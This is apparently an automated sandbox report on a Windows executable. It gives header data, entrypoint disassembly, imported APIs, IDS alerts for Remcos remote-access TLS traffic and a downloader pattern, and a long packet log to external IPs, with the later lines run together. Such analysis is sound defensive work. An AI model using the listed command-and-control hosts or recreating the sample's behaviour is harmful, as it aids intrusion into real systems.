                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L....{.W.................`...|.....
Icon Hash: 27eee66466b2bc17
Entrypoint: 0x40310f
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x57807BD9 [Sat Jul 9 04:21:45 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: b78ecf47c0a3e24a6f4af114e2d1f5de
Instruction (disassembly at entrypoint)
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004070A8h]
call dword ptr [004070A4h]
cmp ax, 00000006h
je 00007FC7EC3F83A3h
push ebx
call 00007FC7EC3FB311h
cmp eax, ebx
je 00007FC7EC3F8399h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007FC7EC3FB28Dh
push esi
call dword ptr [004070A0h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007FC7EC3F837Dh
push ebp
push 00000009h
call 00007FC7EC3FB2E4h
push 00000007h
call 00007FC7EC3FB2DDh
mov dword ptr [0042E404h], eax
call dword ptr [00407044h]
push ebx
call dword ptr [00407288h]
mov dword ptr [0042E4B8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00428828h
call dword ptr [00407174h]
push 00409188h
push 0042DC00h
call 00007FC7EC3FAF07h
call dword ptr [0040709Ch]
mov ebp, 00434000h
push eax
push ebp
call 00007FC7EC3FAEF5h
push ebx
call dword ptr [00407154h]
Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804
Data directories
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7534 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3e000 | 0x25530 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5fdd | 0x6000 | 38462d04cfdbc4943d18be461d53cc3e | False | 0.6783854166666666 | data | 6.499697507009752 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1352 | 0x1400 | 3d134ae5961af9895950a7ee0adc520a | False | 0.4583984375 | data | 5.207538993430304 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x254f8 | 0x600 | 2d00401e0c64d69b6d0ccb877d9f624e | False | 0.4544270833333333 | data | 4.0323505938358934 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2f000 | 0xf000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3e000 | 0x25530 | 0x25600 | 9f55b761ab865e3d7495845bec25ddbe | False | 0.6279264214046822 | data | 6.673760766904296 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x3e3b8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.33418608777948655
RT_ICON | 0x4ebe0 | 0xe47b | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9980680788497376
RT_ICON | 0x5d060 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.5007261410788382
RT_ICON | 0x5f608 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.5839587242026266
RT_ICON | 0x606b0 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | United States | 0.6289978678038379
RT_ICON | 0x61558 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | United States | 0.7572202166064982
RT_ICON | 0x61e00 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | United States | 0.7261560693641619
RT_ICON | 0x62368 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.7597517730496454
RT_ICON | 0x627d0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | United States | 0.5241935483870968
RT_ICON | 0x62ab8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | United States | 0.5912162162162162
RT_DIALOG | 0x62be0 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x62ce0 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x62e00 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x62ec8 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x62f28 | 0x92 | data | English | United States | 0.6575342465753424
RT_VERSION | 0x62fc0 | 0x22c | data | English | United States | 0.5341726618705036
RT_MANIFEST | 0x631f0 | 0x340 | XML 1.0 document, ASCII text, with very long lines (832), with no line terminators | English | United States | 0.5540865384615384
DLL | Import
KERNEL32.dll | SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll | ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll | RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP / Dest Port | Protocol
2024-11-11T08:10:50.401480+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.11.20 | 49767 | 104.21.13.139 / 443 | TCP
2024-11-11T08:10:55.239935+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.11.20 | 49769 | 87.120.114.2053279 | TCP
2024-11-11T08:10:56.661525+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.11.20 | 49772 | 87.120.114.2053279 | TCP
2024-11-11T08:10:56.677130+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.11.20 | 49771 | 87.120.114.2053279 | TCP
2024-11-11T08:10:56.692900+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.11.20 | 49770 | 87.120.114.2053279 | TCP
2024-11-11T08:10:56.725745+0100 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.11.20 | 49773 | 178.237.33.50 / 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 11, 2024 08:10:49.351553917 CET | 49767 | 443 | 192.168.11.20 | 104.21.13.139
Nov 11, 2024 08:10:49.351629019 CET | 443 | 49767 | 104.21.13.139 | 192.168.11.20
Nov 11, 2024 08:10:49.351838112 CET | 49767 | 443 | 192.168.11.20 | 104.21.13.139
Nov 11, 2024 08:10:49.366987944 CET | 49767 | 443 | 192.168.11.20 | 104.21.13.139
Nov 11, 2024 08:10:49.367014885 CET | 443 | 49767 | 104.21.13.139 | 192.168.11.20
Nov 11, 2024 08:10:49.614284992 CET | 443 | 49767 | 104.21.13.139 | 192.168.11.20
Nov 11, 2024 08:10:49.614604950 CET | 49767 | 443 | 192.168.11.20 | 104.21.13.139
Nov 11, 2024 08:10:49.641227007 CET | 49767 | 443 | 192.168.11.20 | 104.21.13.139
Nov 11, 2024 08:10:49.641238928 CET | 443 | 49767 | 104.21.13.139 | 192.168.11.20
Nov 11, 2024 08:10:49.641472101 CET | 443 | 49767 | 104.21.13.139 | 192.168.11.20
Nov 11, 2024 08:10:49.641583920 CET | 49767 | 443 | 192.168.11.20 | 104.21.13.139
Nov 11, 2024 08:10:49.643376112 CET | 49767 | 443 | 192.168.11.20 | 104.21.13.139
Nov 11, 2024 08:10:49.688230991 CET | 443 | 49767 | 104.21.13.139 | 192.168.11.20
Nov 11, 2024 08:10:50.401499987 CET | 443 | 49767 | 104.21.13.139 | 192.168.11.20
Nov 11, 2024 08:10:50.401717901 CET | 49767 | 443 | 192.168.11.20 | 104.21.13.139
Nov 11, 2024 08:10:50.401724100 CET | 443 | 49767 | 104.21.13.139 | 192.168.11.20
Nov 11, 2024 08:10:50.401887894 CET | 49767 | 443 | 192.168.11.20 | 104.21.13.139
Nov 11, 2024 08:10:50.419281960 CET | 49767 | 443 | 192.168.11.20 | 104.21.13.139
Nov 11, 2024 08:10:50.419307947 CET | 443 | 49767 | 104.21.13.139 | 192.168.11.20
Nov 11, 2024 08:10:50.557188988 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:50.557224035 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:50.557426929 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:50.557713032 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:50.557734013 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:50.804460049 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:50.804744959 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:50.806977034 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:50.807029009 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:50.808024883 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:50.808232069 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:50.808577061 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:50.856059074 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.386516094 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.386668921 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.386717081 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:52.386768103 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.386854887 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.386862993 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:52.386960030 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:52.386964083 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.387005091 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.387032032 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:52.387144089 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:52.387151003 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.387177944 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.387320042 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:52.387330055 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.387367010 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.387521029 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.387581110 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:52.387613058 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.387723923 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:52.387819052 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.387909889 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:52.387928009 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.387944937 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.388039112 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:52.388127089 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.388214111 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:52.388241053 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.388319016 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:52.388422012 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:52.388663054 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.388817072 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.388864994 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:52.388895035 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.388911963 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.388987064 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:52.389039993 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:52.389039993 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:52.389421940 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.389563084 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.389616013 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:52.389621019 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.389662027 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.389760971 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:52.389816046 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:52.493927002 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.494136095 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.494194031 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:52.494261980 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.494303942 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:52.494389057 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.494457960 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:52.494488955 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.494509935 CET | 443 | 49768 | 172.67.200.96 | 192.168.11.20
Nov 11, 2024 08:10:52.494617939 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
Nov 11, 2024 08:10:52.494689941 CET | 49768 | 443 | 192.168.11.20 | 172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.494729996 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.494930983 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.495158911 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.495333910 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.495357990 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.495408058 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.495541096 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.495599985 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.495632887 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.495822906 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.495903015 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.496155024 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.496159077 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.496225119 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.496304989 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.496325016 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.496402979 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.496438026 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.496522903 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.496673107 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.496824026 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.497000933 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.497001886 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.497068882 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.504035950 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.504343987 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.504786015 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.504997015 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.505064964 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.505377054 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.505605936 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.505631924 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.505676031 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.505938053 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.505937099 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.505981922 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.506007910 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.506215096 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.506347895 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.506405115 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:52.506656885 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.649230957 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.649401903 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.649537086 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.649591923 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.649617910 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.649822950 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.649995089 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.650221109 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.650274992 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.650511980 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.758994102 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.759207964 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.759263992 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.759327888 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.759474993 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.759501934 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.759501934 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.759550095 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.759577036 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.759676933 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.759733915 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.759767056 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.759787083 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.759907961 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.759907961 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.759977102 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.866419077 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.866564035 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.866646051 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.866687059 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.866714001 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.866820097 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.866935015 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.867211103 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.867425919 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.867465973 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.867774963 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.868076086 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.868340015 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.868545055 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.868763924 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.868769884 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.868788004 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.868977070 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.869452000 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.869666100 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.870233059 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.870433092 CET44349768172.67.200.96192.168.11.20
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.870445967 CET49768443192.168.11.20172.67.200.96
                                                                                                                                                                                                        Nov 11, 2024 08:10:53.870464087 CET44349768172.67.200.96192.168.11.20
